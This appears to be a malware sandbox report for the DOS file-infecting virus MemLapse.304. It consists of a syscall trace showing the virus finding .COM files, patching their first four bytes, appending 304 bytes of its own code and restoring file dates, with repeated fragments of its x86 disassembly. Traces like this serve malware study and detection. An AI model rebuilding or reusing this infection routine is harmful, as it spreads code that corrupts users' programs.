Sample viewer

vx.netlux.org/Virus.DOS.MemLapse.304

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:07.14369804Z 26 PC: 12a6c | Set disk transfer address
2018-12-17T22:57:07.145444503Z 78 PC: 12a75 | Find first file
2018-12-17T22:57:07.152007763Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.153649459Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.158764676Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.162428404Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.182364153Z 61 PC: 12aa6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:57:07.190430569Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.198572746Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.200086191Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.201567456Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.20517024Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.206900643Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.216224873Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
0x12b04: mov al, cl
0x12b06: mov ax, 0x2c00
0x12b09: int 0x21
0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
2018-12-17T22:57:07.219452461Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
0x12b32: mov ah, 0x3b
0x12b34: int 0x21
0x12b36: jb 0x12b3b
0x12b38: jmp 0x12a6d
2018-12-17T22:57:07.221959484Z 64 PC: 12b19 | Write file or device (Write 163 bytes on handle 5)
2018-12-17T22:57:07.225230473Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.22764894Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.236453002Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.239398379Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.241214814Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.244533774Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.246122431Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.249075663Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.25123902Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.262370708Z 61 PC: 12aa6 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:57:07.269692353Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.277431433Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.279181403Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.280983421Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.285470196Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.287310555Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.290257005Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
0x12b04: mov al, cl
0x12b06: mov ax, 0x2c00
0x12b09: int 0x21
0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
2018-12-17T22:57:07.292818581Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
0x12b32: mov ah, 0x3b
0x12b34: int 0x21
0x12b36: jb 0x12b3b
0x12b38: jmp 0x12a6d
2018-12-17T22:57:07.294991777Z 64 PC: 12b19 | Write file or device (Write 38 bytes on handle 5)
2018-12-17T22:57:07.297495093Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.301665022Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.307837296Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.310609518Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.313080554Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.31642943Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.317958985Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.32768476Z 61 PC: 12aa6 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:57:07.335177817Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.342371612Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.344223103Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.346547092Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.349751246Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.351668039Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.355703597Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
0x12b04: mov al, cl
0x12b06: mov ax, 0x2c00
0x12b09: int 0x21
0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
2018-12-17T22:57:07.35857772Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
0x12b32: mov ah, 0x3b
0x12b34: int 0x21
0x12b36: jb 0x12b3b
0x12b38: jmp 0x12a6d
2018-12-17T22:57:07.36131199Z 64 PC: 12b19 | Write file or device (Write 38 bytes on handle 5)
2018-12-17T22:57:07.365111183Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.36857774Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.37764124Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.381247529Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.382655096Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.385551722Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.387202105Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.399282696Z 61 PC: 12aa6 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:57:07.406237231Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.412872595Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.415124399Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.416610623Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.419350875Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.421515164Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.424187448Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
0x12b04: mov al, cl
0x12b06: mov ax, 0x2c00
0x12b09: int 0x21
0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
2018-12-17T22:57:07.426290311Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
0x12b32: mov ah, 0x3b
0x12b34: int 0x21
0x12b36: jb 0x12b3b
0x12b38: jmp 0x12a6d
2018-12-17T22:57:07.428799218Z 64 PC: 12b19 | Write file or device (Write 41 bytes on handle 5)
2018-12-17T22:57:07.432359482Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.43406085Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.443776296Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.44761337Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.449106046Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.452856587Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.45466669Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.457676819Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.459218177Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.47023036Z 61 PC: 12aa6 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:57:07.477529543Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.491697268Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.494668685Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.496508133Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.499476744Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.502412593Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.505806874Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
0x12b04: mov al, cl
0x12b06: mov ax, 0x2c00
0x12b09: int 0x21
0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
2018-12-17T22:57:07.508653727Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
0x12b32: mov ah, 0x3b
0x12b34: int 0x21
0x12b36: jb 0x12b3b
0x12b38: jmp 0x12a6d
2018-12-17T22:57:07.512018733Z 64 PC: 12b19 | Write file or device (Write 171 bytes on handle 5)
2018-12-17T22:57:07.516209903Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.517906472Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.526350087Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.529143498Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.530695306Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.542105788Z 61 PC: 12aa6 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:57:07.547565472Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.553965234Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.555789173Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.560540085Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.563668666Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.56541537Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.577546647Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
0x12b04: mov al, cl
0x12b06: mov ax, 0x2c00
0x12b09: int 0x21
0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
2018-12-17T22:57:07.580041488Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
0x12b32: mov ah, 0x3b
0x12b34: int 0x21
0x12b36: jb 0x12b3b
0x12b38: jmp 0x12a6d
2018-12-17T22:57:07.582367611Z 64 PC: 12b19 | Write file or device (Write 46 bytes on handle 5)
2018-12-17T22:57:07.590627269Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.593570262Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.60269114Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.607573348Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.609035878Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.620262024Z 61 PC: 12aa6 | Open file (Filename = 'PAH.COM')
2018-12-17T22:57:07.62860053Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.636076325Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:57:07.637985314Z 87 PC: 12ad6 | Get or set file date and time
2018-12-17T22:57:07.640082927Z 64 PC: 12ae9 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:07.643668188Z 66 PC: 12af2 | Move file pointer
2018-12-17T22:57:07.645340151Z 64 PC: 12afd | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:07.648757125Z 44 PC: 12b02 | Get time 0x12b02: mov cl, dl
0x12b04: mov al, cl
0x12b06: mov ax, 0x2c00
0x12b09: int 0x21
0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
2018-12-17T22:57:07.651785849Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
0x12b0d: add cl, al
0x12b0f: ror cl, 1
0x12b11: xor ch, ch
0x12b13: xor dx, dx
0x12b15: mov ah, 0x40
0x12b17: int 0x21
0x12b19: mov cx, word ptr [0x220]
0x12b1d: mov dx, word ptr [0x21e]
0x12b21: mov ax, 0x5701
0x12b24: int 0x21
0x12b26: mov ah, 0x3e
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f
0x12b2c: jmp 0x12a6f
0x12b2f: mov dx, 0x21b
0x12b32: mov ah, 0x3b
0x12b34: int 0x21
0x12b36: jb 0x12b3b
0x12b38: jmp 0x12a6d
2018-12-17T22:57:07.654303683Z 64 PC: 12b19 | Write file or device (Write 49 bytes on handle 5)
2018-12-17T22:57:07.657323941Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.659694438Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.668708865Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.671798974Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.673954286Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.684738701Z 61 PC: 12aa6 | Open file (Filename = 'TEST.COM')
2018-12-17T22:57:07.692129937Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.699766945Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.701900275Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.704511404Z 59 PC: 12b36 | Change current directory
2018-12-17T22:57:07.710324784Z 26 PC: 12b42 | Set disk transfer address